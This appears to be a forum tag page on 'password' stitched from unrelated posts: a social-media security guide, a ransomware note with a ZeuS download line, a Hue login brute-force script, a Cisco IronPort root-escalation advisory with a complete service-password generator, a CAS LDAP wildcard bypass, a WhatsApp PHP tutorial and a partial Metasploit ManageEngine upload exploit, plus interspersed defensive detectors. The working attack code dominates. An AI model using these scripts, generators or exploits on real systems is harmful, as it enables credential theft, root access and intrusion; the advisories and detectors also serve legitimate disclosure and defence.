Showing results for tags 'password'.
  1. Social media platforms provide fertile ground for communication without borders, so there is actually no limitation as to the potential benefits that these platforms can offer to you. This is why so many Internet users have been registering for new accounts on Facebook, Twitter, Pinterest and Google+ on a daily basis, opening just another window of communication and online interaction with friends, relatives or even mere acquaintances and total strangers. Most people own more than a couple of accounts on social media sites and use them fairly regularly (even every day, as we have mentioned above). They connect with others and share personal information, videos and pictures of them and their loved ones. They also share their thoughts and anything else worthy of attention.

     Due to the significant increase in social media accounts and their gravity, there have been major incidents of hacking. This means that many social media accounts get hacked, and this is not a rare phenomenon to comment on. On the contrary, many people have to confront such a negative consequence of the importance of social media nowadays; social media is an easy and simple way for hackers and other malicious intruders to have their way and penetrate the systems of many other people (the followers of the person whose account has been breached) at once. Let’s start by looking into the signs that reveal the hacking, in order for you to be on alert and know when something is wrong with your account.

     Signs of a Hacked Social Media Account

     Although it can be difficult to realize that your social media account has been compromised, there are definitely signs that should raise an eyebrow and motivate you to look deeper into the root of the problem. Some of the most frequent signs that reveal something is not great about your account include the following:

     • You instantly observe likes and follows that you had nothing to do with
     • You have your status updated, although you have not shared anything
     • There is an ad flood on your page (unusually extensive)
     • You have trouble logging in
     • Private messages are posted on your behalf
     • Spam posts are posted on your behalf
     • You have new friends that you do not recall adding
     • Others inform you of sharing malicious content on your wall

     If you notice some of these signs, you had better check it out and not sit idly. It is more than likely that your account has been hacked and you need to act promptly and effectively.

     How do accounts get hacked?

     In order for you to know how to be safe on social media, you need to know where the threat lies. Indeed, hacking a social media account is a lot easier and simpler than you would have expected it to be. There are sophisticated menaces nowadays lurking in the dark and targeting Internet users, so as to penetrate their system and access their sensitive data. These are the major methods for hacking a social media account being used by cybercriminals:

     • Password exposed
     • Phishing
     • Malware installed
     • Sites being hacked
     • Third-party apps or services breached

     As you can see, there are multiple routes to getting the desired effect, and it is true that today the threats that appear online are far more advanced and sophisticated than a few years ago. So, your defensive line should be equally strong. Below, we are going to have a look at what you need to do if your social media account gets hacked.

     What to do if your social media account has been hacked

     Even if hacking has occurred, you should not panic. There are several steps that you can take in order for you to terminate the threat and reset the protection layering on your computer. Just follow the guidelines provided below in avoidance of any further damage. With dedicated work and attention, you will be able to regain your social media account and have nobody else threatening its integrity and uniqueness.

     • Of course it is crucial that you change your password immediately and that you use a solid password that has never been used by you anywhere else. The common strategy of using the same password on all of your accounts (email, banking accounts and social media platforms) can be catastrophic!
     • Delete the apps that appear on your social media account and that you know nothing about. If you have not installed anything, you do not need it on your account.
     • Equally important for safe social media is to set the default email address of your accounts and check that it is available for you to reach.
     • Make sure that your antivirus is up-to-date and schedule a thorough scan for any threats on your computer. If you use social media on multiple devices, have them all scanned.
     • Report spam posts, as they can hide malware and other threats. If a friend of yours clicks on them he might get in trouble and have his account hacked, too. You cannot allow this vicious circle to go on indefinitely.
     • Think twice before clicking on anything. New malware can crawl up to your account and therefore you need to be vigilant and eliminate such threats.
     • Use secure platforms for paid messaging. It is imperative that you buy the ads that you want right from the platform and not have a third party getting in the way.
     • Last but not least, make sure that your online information is safe. Do not reveal information that is linked to your account and do not expose too many details from your personal life online.

     How to prevent hacking on social media

     We have already outlined what needs to be done after having realized that your social media account has been breached. Nevertheless, it is essential that you know what you ought to do, in avoidance of repeating the same mistakes. You ought to enhance your security layering and allow nothing to penetrate the safety of your online navigation. There are some fundamental details that will make a huge difference for you, and that will offer great power and effectiveness against malware and other threats.

     First of all, you need to be cautious with your password. Besides choosing to use a solid password that is hard to guess, you need to be really scholastic about others knowing. Even if you use social media at work, you cannot risk having your password in use when leaving your office. Always log out and be twice as scholastic with shared computers. Do not share your password with others, even with your best friend or your better half. This is private for a reason and you should never underestimate the risk that you take when letting someone else know your private information.

     Apart from that, you ought to introduce yourself to two-factor authentication. This is an extra weapon that you can use to enhance the protection offered to you via your password. With two-factor authentication, you eliminate the threat of someone else breaching your social media account (or any other account, apparently). There is another step that has to be followed and another piece of information for someone else to breach, prior to gaining access to your social media account. So, this is a great weapon that can be put into effect and act like an armor for you online.

     Bottom line

     Safer social media can be really hard to achieve; however, if you are concentrated on what you do and if you focus on the guidelines that we have provided, you will see that you can recover from a potential hacking of your social account without any delay or frustration. Of course, you can follow these simple guidelines even if you haven’t been hacked – prevention is better than the cure, right? Feel free to enhance your social media account protection right away. This will keep all dangers at bay and shield you against the malicious intent of others on the web. Remember that social media platforms can be truly helpful, provided that you know how to use them and what safety precautions you ought to take.

     Source
  2. Generic ransomware pushed to small ZeuS botnet machines by script:

     user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe)

     [attachment: zeus script.png]

     ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX)
     6ec6069728a91a04407283bc6bf208b7 UNPACKED

     Some generic ransomware junk. Run in a VM, it asks for a password to decrypt files, so I thought I would try to crack it.

     [attachment: winxp.png]

     I'm not a great RE like most ppl on here, so I gave up and just patched the binary:

     Change 00401C19 > JMP 0040124F (decryption routine)

     Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out.

     Download Source
  3. That should be plenty for you! Good luck with your work! PS: At least leave a like if it was useful to you!
  4. Scan: Fucking Scan Me! - Results
     Download: https://www.sendspace.com/file/q9qlpx
     Password: RAR SIMPLE SYGGGGGY
  5. Hadoop User Experience password cracking script. Written in Python.

         #!/usr/bin/python
         import sys
         import requests
         import datetime
         from fake_useragent import UserAgent

         ## CONFIG STARTS HERE ##
         user = "admin"
         host = "hostname:port"
         listfile = "~/dictionaries/top1000-worst-passwords.txt"
         ## CONFIG ENDS HERE##

         dictionary = open(listfile)
         list = dictionary.readlines()
         words = [ ]

         print "Initializing dictionary",
         for entry in list:
             print('.'),
             newword = entry.rstrip("\n")
             words.append(newword)

         print "Now testing "
         for password in words:
             ua = UserAgent().random
             headers = { "User-Agent" : ua }
             post = { "username" : user, "password" : password }
             r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)
             invalid = r.text.find("Invalid")
             if invalid == -1:
                 print "\nSuccess! " + user + ":" + password
                 print "Completed test at ",
                 print datetime.datetime.now()
                 sys.exit()
             else:
                 print "...."

         print "Attack unsuccessful...Completed at ",

     Source
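Added here as a defender's example, not part of the original post: a small Python 3 detector that flags the traffic pattern the script above produces, namely a burst of POSTs to /accounts/login/ from one client with a different User-Agent on every request. The log lines are constructed, and it is assumed that a reverse proxy in front of Hue writes combined-format access logs; the window size and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format (assumption: written by a proxy in front of Hue).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoint the script hammers; it detects failure by searching the body for
# "Invalid", which suggests a failed login renders the form with a normal
# status rather than an error code. So we count attempts instead of statuses.
LOGIN_PATH = "/accounts/login/"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d


def login_posts(lines):
    """Yield parsed entries that are POSTs to the Hue login endpoint."""
    for line in lines:
        e = parse_line(line)
        if e and e["method"] == "POST" and e["path"].startswith(LOGIN_PATH):
            yield e


def find_bruteforce(lines, window=timedelta(seconds=60),
                    min_attempts=10, min_ua_ratio=0.5):
    """Return {ip: (attempts, distinct_user_agents)} for clients with at least
    min_attempts login POSTs inside any sliding window, where the share of
    distinct User-Agents is at least min_ua_ratio (the rotating-UA signature).
    The largest qualifying window per client is reported."""
    by_ip = defaultdict(list)
    for e in login_posts(lines):
        by_ip[e["ip"]].append(e)

    flagged = {}
    for ip, entries in by_ip.items():
        entries.sort(key=lambda e: e["ts"])
        best = None
        start = 0
        for end in range(len(entries)):
            while entries[end]["ts"] - entries[start]["ts"] > window:
                start += 1
            win = entries[start:end + 1]
            uas = {e["ua"] for e in win}
            if len(win) >= min_attempts and len(uas) / len(win) >= min_ua_ratio:
                if best is None or len(win) > best[0]:
                    best = (len(win), len(uas))
        if best:
            flagged[ip] = best
    return flagged


def sample_log():
    """Constructed sample: 12 login POSTs from 10.0.0.5 within 22 seconds, each
    with a different User-Agent (what fake_useragent's random choice yields),
    plus ordinary traffic from 10.0.0.9."""
    lines = []
    for i in range(12):
        lines.append(
            '10.0.0.5 - - [01/Jan/2024:10:00:%02d +0000] '
            '"POST /accounts/login/?next=/ HTTP/1.1" 200 1834 "-" '
            '"Mozilla/5.0 (Windows NT 10.0) UA-%d"' % (i * 2, i)
        )
    lines.append('10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] '
                 '"GET /accounts/login/ HTTP/1.1" 200 1834 "-" "Mozilla/5.0 Firefox"')
    lines.append('10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] '
                 '"POST /accounts/login/?next=/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 Firefox"')
    return lines


if __name__ == "__main__":
    for ip, (n, uas) in find_bruteforce(sample_log()).items():
        print("%s: %d login attempts in window, %d distinct User-Agents" % (ip, n, uas))
```

The same counting is what a rate limit on the login endpoint would key on; a lockout or delay after a handful of failures per source makes the wordlist loop above impractical.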
  7. /*
Cisco Ironport Appliances Privilege Escalation Vulnerability

Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
  Cisco Ironport ESA - AsyncOS 8.5.5-280
  Cisco Ironport WSA - AsyncOS 8.0.5-075
  Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco

Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure

Description:
Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. Enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to a weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.

Vendor Response:
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE, however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting the algorithm better in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator sets the pass-phrase and enables the account.

[SD] Note: Administrative credentials are needed in order to activate the access for the support representative and to set up the pass-phrase that is used to compute the final password.

[GC] Still, the Admin user has limited permissions on the appliance and credentials can get compromised too, even with the default password, leading to full root access.

[SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011, for the SMA by Cisco bug id: CSCuo96056 and for the WSA by Cisco bug id CSCuo90528.

Technical Details:
By logging in to the appliance using the default password "ironport" or a user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.

PoC:

Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.

AsyncOS 8.5.5 for Cisco C100V build 280

Welcome to the Cisco C100V Email Security Virtual Appliance

Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.

ironport.example.com> service

Service Access is currently disabled.
Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this?
[Y/N]> Y

Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system.
[]> cisco123

Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)

ironport.example.com>

Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe

Usage: woofwoof.exe -p password -s serial
  -p <password> | Cisco Service Temp Password
  -s <serial>   | Cisco Serial Number
  -h            | This Help Menu

  Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4

Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Password: b213c9a4

Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.

AsyncOS 8.5.5 for Cisco C100V build 280

Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"

#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"

void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);

int main(int argc, char *argv[])
{
    if (argc < 2) {
        usage(argv[0]);
    }

    int opt;
    int index;
    char *temp_pass = NULL;
    char *serial_no = NULL;
    char *secret_pass = SECRET_PASS;
    char service[MAX_BUFFER] = { 0 };
    unsigned char digest[16] = { 0 };

    while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
        switch (opt) {
        case 'p':
            temp_pass = optarg;
            break;
        case 's':
            serial_no = optarg;
            break;
        case 'h':
            usage(argv[0]);
            break;
        default:
            printf_s("Wrong Argument: %s\n", argv[1]);
            break;
        }
    }

    /* any leftover non-option argument is a usage error */
    for (index = optind; index < argc; index++) {
        usage(argv[0]);
        exit(0);
    }

    if (temp_pass == NULL || serial_no == NULL) {
        usage(argv[0]);
        exit(0);
    }

    if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
        /* normalise both inputs the same way the appliance does, then
         * concatenate: fuzzed temp password + lowercased serial + fixed secret */
        to_lower(serial_no);
        fuzz_string(temp_pass);
        strcpy_s(service, sizeof(service), temp_pass);
        strcat_s(service, sizeof(service), serial_no);
        strcat_s(service, sizeof(service), secret_pass);

        MD5_CTX context;
        MD5_Init(&context);
        MD5_Update(&context, service, strlen(service));
        MD5_Final(digest, &context);

        /* only the first 4 bytes of the digest (8 hex chars) form the password */
        printf_s("Service Password: ");
        for (int i = 0; i < sizeof(digest) - 12; i++)
            printf("%02x", digest[i]);
    }
    return 0;
}

/* character substitutions applied to the temporary password */
void fuzz_string(char *str)
{
    while (*str) {
        switch (*str) {
        case '1':
            *str = 'i';
            break;
        case '0':
            *str = 'o';
            break;
        case '_':
            *str = '-';
            break;
        }
        str++;
    }
}

void to_lower(char *str)
{
    while (*str) {
        if (*str >= 'A' && *str <= 'Z') {
            *str += 0x20;
        }
        str++;
    }
}

void usage(char *name)
{
    printf_s("\nUsage: %s -p password -s serial\n", name);
    printf_s("  -p <password> | Cisco Service Temp Password\n");
    printf_s("  -s <serial>   | Cisco Serial Number\n");
    printf_s("  -h            | This Help Menu\n");
    printf_s("\n  Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
    exit(0);
}

Source
  8. Free BIOS Master Password Generator for Laptops
  9. PHP Script to send and receive messages on WhatsApp

I have been reading many tutorials for sending and receiving WhatsApp messages via PHP, but there is not a single article which explains properly, with steps, how to retrieve your WhatsApp password, which is created and stored on the WhatsApp server when you create a WhatsApp account; that is the main challenge as of now in other articles. Thanks to this tool, which has made 50% of the work easy: https://github.com/shirioko/WART

Okay, so we will quickly go through the steps for the WhatsApp Registration Tool:
Go to the link https://github.com/shirioko/WART
Download the whole project by clicking Clone to Desktop
Run the WART-1.7.3.0 exe file (WART)
Enter the phone number with country code (e.g. India number: 91xxxxxxxxxx). P.s. Do not put any special symbol like (+91) for India
Click on Request Code and you will receive a code from WhatsApp on the entered mobile number.
Now verify that code in the 2nd step and that's it. You are here. Your password will appear.
P.s. Do not share your password with anyone because it can be used in a loop for any kind of messages.

Okay, now we are done with 50% of the task. Now we need to write the PHP script which will send messages to a WhatsApp registered number. You will need 2 things for sending messages to WhatsApp through PHP:
Username (WHICH IS YOUR MOBILE NUMBER WITH COUNTRY CODE): 91xxxxxxxxxxx
Password (which you got from the WART.EXE tool)

Alright Sparky, let's get this done.....

<?php
require_once './src/whatsprot.class.php';

$username = "919xxxxxxxxx"; // Mobile phone prefixed with country code, so for India it will be 91xxxxxxxx
$password = "your password";

$w = new WhatsProt($username, 0, "Mayank Grover Blog", true); // Name your application by replacing "WhatsApp Messaging"
$w->connect();
$w->loginWithPassword($password);

$target  = '91xxxxxxxxxxx'; // Target phone, receiver phone
$message = 'Hello User !! This is a Tutorial for sending messages via php to WhatsApp Account';

$w->SendPresenceSubscription($target); // Let us first send presence to user
$w->sendMessage($target, $message);    // Send Message
echo "Message Sent Successfully";
?>

So everything is quite clear in the above script, i.e. you need to set your application details: username as mobile number, password which you got from the WART tool, target as your target mobile number and lastly the message (plain text which you need to send).

Okay, now I know many questions are coming in your mind.

In the first line, require src/whatsprot.class.php, what is this??? You need to download the WhatsApi from this link. There you will find the src directory with all the source files.

Can we only send plain text messages or media like images and videos??? Yes, we can send media files also. So next I will be writing a PHP script to send media files to any WhatsApp account.

SOURCE
  10. =====[Alligator Security Team - Security Advisory]========

CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards.

Reporter: José Tozo < juniorbsd () gmail com >

=====[Table of Contents]==================================
1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References

=====[1. Background]======================================
CAS is an authentication system originally created by Yale University to provide a trusted way for an application to authenticate a user.

=====[2. Detailed description]============================
A valid username and password are required. Given a username johndoe and a password superpass, you can successfully achieve login using wildcards:

username: jo*
password: superpass

The login will be successful only if the ldap bind search returns one unique member.

The vulnerability described in this document can be validated using the following example:

Client Request:
root@machine:/# curl -k -L -d "username=jo%2A&password=superpass" https://login.cas-server.com/v1/tickets
(note that * was url encoded to %2A)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>201 The request has been fulfilled and resulted in a new resource being created</title>
</head>
<body>
<h1>TGT Created</h1>
<form action="https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz" method="POST">Service:<input type="text" name="service" value=""><br><input type="submit" value="Submit"></form>
</body>
</html>

Server log:
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
SERVER IP ADDRESS: xxx.xxx.xxx.xxx
=============================================================

=====[3. Other contexts & solutions]======================
In order to apply the patch, you have to update at least to version 3.5.3. Newer versions, such as CAS 4.0.0 and above, are not vulnerable.

=====[4. Timeline]========================================
29/12/14 Vendor notification.
14/01/15 Vendor rolled out new version 3.5.3
17/01/15 Mitre assigned CVE-2015-1169.
21/01/15 Disclosure date.

=====[5. References]=======================================
1 - https://github.com/Jasig/cas/pull/411
2 - https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c

--
Grato,
Tozo

Source
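As an added defensive illustration of the advisory above (this is example code, not part of the Alligator advisory or of CAS), the two controls that close this class of bug on the application side: escaping user input per RFC 4515 before it reaches an LDAP filter, rejecting account names that carry filter metacharacters at all, and a small scan over the CAS audit-log format shown in the advisory that flags ticket grants for such names. The `uid` attribute name and the sample audit records are assumptions constructed for the example.

```python
import re

# RFC 4515: characters with meaning inside an LDAP search filter are encoded as \XX.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Escape a user-supplied value before interpolating it into an LDAP filter.
    A username of 'jo*' becomes 'jo\\2a', which matches only the literal string."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter(username: str, uid_attr: str = "uid") -> str:
    """Filter a CAS-style LDAP handler would use to look up the bind DN.
    uid_attr is an assumed attribute name; adjust to the directory schema."""
    return f"({uid_attr}={escape_ldap_filter_value(username)})"


# Allow-list check an authentication front end can apply before any directory
# lookup: account names are letters, digits, dot, underscore and hyphen only.
_USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def is_acceptable_username(username: str) -> bool:
    return bool(_USERNAME_RE.match(username))


# --- audit log review, using the record layout shown in the advisory ---------
_RECORD_SEP = re.compile(r"^=+\s*$", re.M)          # rules of '=' separate records
_WHO_RE = re.compile(r"WHO: \[username: (?P<user>[^\]]*)\]")
_ACTION_RE = re.compile(r"ACTION: (?P<action>[A-Z_]+)")


def suspicious_ticket_grants(audit_log: str) -> list:
    """Return the usernames for which a TGT was created even though the name
    would not pass the allow-list (wildcards, parentheses, backslashes...)."""
    hits = []
    for record in _RECORD_SEP.split(audit_log):
        who = _WHO_RE.search(record)
        action = _ACTION_RE.search(record)
        if not (who and action):
            continue
        if action.group("action") == "TICKET_GRANTING_TICKET_CREATED":
            user = who.group("user")
            if not is_acceptable_username(user):
                hits.append(user)
    return hits


# Constructed sample audit log (two records) in the advisory's format; the
# ticket ids and addresses are placeholders, not real values.
SAMPLE_AUDIT_LOG = """\
=============================================================
WHO: [username: johndoe]
WHAT: TGT-75-[constructed]
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:37:02 BRST 2015
CLIENT IP ADDRESS: 203.0.113.10
SERVER IP ADDRESS: 198.51.100.20
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-[constructed]
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: 203.0.113.10
SERVER IP ADDRESS: 198.51.100.20
=============================================================
"""

if __name__ == "__main__":
    print(build_user_filter("jo*"))                 # (uid=jo\2a)
    print(suspicious_ticket_grants(SAMPLE_AUDIT_LOG))  # ['jo*']
```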
  11. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine Multiple Products Authenticated File Upload',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
        AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that
        accepts the upload does not handle correctly '../' sequences, which can be abused to
        write in the file system. Authentication is needed to exploit this vulnerability, but
        this module will attempt to login using the default credentials for the administrator
        and guest accounts. Alternatively you can provide a pre-authenticated cookie or a
        username / password combo. For IT360 targets enter the RPORT of the ServiceDesk
        instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including
        MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are
        vulnerable. At the time of release of this module, only ServiceDesk v9 has been fixed
        in build 9031 and above. This module has been tested successfully in Windows and
        Linux on several versions.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-5301'],
          ['OSVDB', '116733'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'     => false, # Privileged on Windows but not on Linux targets
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
            {
              'attachment_path' => '/workorder/Attachment.jsp'
            }
          ],
          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
            {
              'attachment_path' => '/common/FileAttachment.jsp'
            }
          ],
          [ 'IT360 v8-v10.4',
            {
              'attachment_path' => '/common/FileAttachment.jsp'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 15 2014'))
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('JSESSIONID', [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
        OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
        OptString.new('USERNAME', [true, 'The username to login as', 'guest']),
        OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']),
        OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to'])
      ], self.class)
  end

  def get_version
    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'GET'
    })

    # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenter; it = it360)
    version = [ 9999, 9999, 0, 'sd' ]

    if res && res.code == 200
      if res.body.to_s =~ /ManageEngine ServiceDesk/
        if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
          output = $1
          # build stays an Integer so the comparisons in check() do not raise
          version = [output[0].to_i, output[2].to_i, 0, 'sd']
        end
        if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/
          # newer builds
          version[2] = $1.to_i
        elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
          # older builds
          version[2] = $1.to_i
        end
      elsif res.body.to_s =~ /ManageEngine AssetExplorer/
        if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
            res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
          output = $1
          version = [output[0].to_i, output[2].to_i, 0, 'ae']
        end
        if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
          version[2] = $1.to_i
        end
      elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
        # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
        version[3] = 'sc'
        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
          # ... but get the build number if we can find it
          version[2] = $1.to_i
        end
      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
        # IT360 newer versions
        version[3] = 'it'
      end
    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
      # IT360 older versions, not a very good detection string but there is no alternative?
      version[3] = 'it'
    end

    version
  end

  def check
    version = get_version
